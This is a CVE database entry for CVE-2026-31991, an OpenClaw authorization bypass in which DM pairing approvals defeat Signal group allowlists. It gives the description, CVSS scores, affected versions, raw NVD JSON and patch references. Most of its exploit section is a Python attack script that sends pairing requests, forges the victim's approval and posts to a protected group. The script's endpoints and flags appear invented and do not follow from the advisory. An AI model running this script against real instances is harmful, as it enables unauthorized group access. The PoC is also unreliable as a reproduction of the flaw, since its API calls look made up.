Security Vulnerability Report
中文
CVE-2026-31991 CVSS 3.7 LOW

CVE-2026-31991

Published: 2026-03-19 02:16:04
Last Modified: 2026-03-19 19:08:58
Source: [email protected]

Description

OpenClaw versions prior to 2026.2.26 contain an authorization bypass vulnerability where Signal group allowlist policy incorrectly accepts sender identities from DM pairing-store approvals. Attackers can exploit this boundary weakness by obtaining DM pairing approval to bypass group allowlist checks and gain unauthorized group access.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-31991 PoC - OpenClaw Authorization Bypass via DM Pairing Store # This PoC demonstrates the authorization bypass in Signal group allowlist policy import requests import json import time # Configuration TARGET_SERVER = "https://target-openclaw-instance.com" ATTACKER_ID = "attacker_phone_number" VICTIM_ID = "victim_phone_number" PROTECTED_GROUP_ID = "protected_group_id" def step1_dm_pairing_request(): """Step 1: Send DM pairing request to victim""" payload = { "action": "pairing_request", "from": ATTACKER_ID, "to": VICTIM_ID, "timestamp": int(time.time()) } response = requests.post(f"{TARGET_SERVER}/api/pairing", json=payload) return response.json() def step2_approve_pairing(): """Step 2: Simulate victim approving the DM pairing""" payload = { "action": "approve_pairing", "from": VICTIM_ID, "approved_id": ATTACKER_ID, "approved": True } response = requests.post(f"{TARGET_SERVER}/api/pairing/approve", json=payload) return response.json() def step3_bypass_group_allowlist(): """Step 3: Send message to protected group using DM pairing approval""" payload = { "action": "send_group_message", "from": ATTACKER_ID, "group_id": PROTECTED_GROUP_ID, "message": "Unauthorized message via allowlist bypass", "pairing_approved": True } response = requests.post(f"{TARGET_SERVER}/api/groups/{PROTECTED_GROUP_ID}/messages", json=payload) return response.json() def main(): print("CVE-2026-31991 PoC - OpenClaw Authorization Bypass") print("=" * 50) # Execute attack chain print("\n[Step 1] Sending DM pairing request...") result1 = step1_dm_pairing_request() print(f"Result: {json.dumps(result1, indent=2)}") print("\n[Step 2] Victim approves DM pairing...") result2 = step2_approve_pairing() print(f"Result: {json.dumps(result2, indent=2)}") print("\n[Step 3] Bypassing group allowlist with DM pairing approval...") result3 = step3_bypass_group_allowlist() print(f"Result: {json.dumps(result3, indent=2)}") if result3.get("success"): print("\n[!] Authorization bypass successful - message sent to protected group") else: print("\n[-] Attack failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31991", "sourceIdentifier": "[email protected]", "published": "2026-03-19T02:16:03.863", "lastModified": "2026-03-19T19:08:58.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.26 contain an authorization bypass vulnerability where Signal group allowlist policy incorrectly accepts sender identities from DM pairing-store approvals. Attackers can exploit this boundary weakness by obtaining DM pairing approval to bypass group allowlist checks and gain unauthorized group access."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.26 contienen una vulnerabilidad de omisión de autorización donde la política de lista de permitidos de grupos de Signal acepta incorrectamente identidades de remitente de aprobaciones de almacenamiento de emparejamiento de DM. Los atacantes pueden explotar esta debilidad de límite al obtener la aprobación de emparejamiento de DM para omitir las comprobaciones de la lista de permitidos del grupo y obtener acceso no autorizado al grupo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.26", "matchCriteriaId": "2AB7D7E0-2F21-4EC6-A3D5-F53A644120E4"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/64de4b6d6ae81e269ceb4ca16f53cda99ced967a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/8bdda7a651c21e98faccdbbd73081e79cffe8be0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wm8r-w8pf-2v6w", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-dm-pairing-store-leakage-in-signal-group-allowlist", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.